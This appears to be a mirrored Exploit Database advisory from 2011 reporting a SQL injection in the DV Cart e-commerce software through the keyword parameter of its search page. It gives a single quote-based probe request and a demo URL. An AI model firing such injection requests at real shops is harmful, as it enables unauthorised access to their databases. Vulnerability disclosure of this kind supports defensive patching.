DV Cart Shopping Cart software – SQL Injection

• Exploit Database
• 7 阅读

• 作者： Eyup CELIK
  日期： 2011-08-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17710/

• # Exploit Title: DV Cart (E-Commerce System) SQL Injection
  # Date: 19.08.2011
  # Author: Eyup CELIK
  # Software Link: http://www.esmistudio.com
  # Version: All Version
  # Tested on: All versions are Vulnerability
  
  ISSUE
  
  SQL Injection can be done using the command input
  
  Example
  index.php?keyword=<SQL Injection Code>&mod=search&submit=GO
  
  Exploit:
  index.php?keyword='1&mod=search&submit=GO
  
  Demo:
  http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO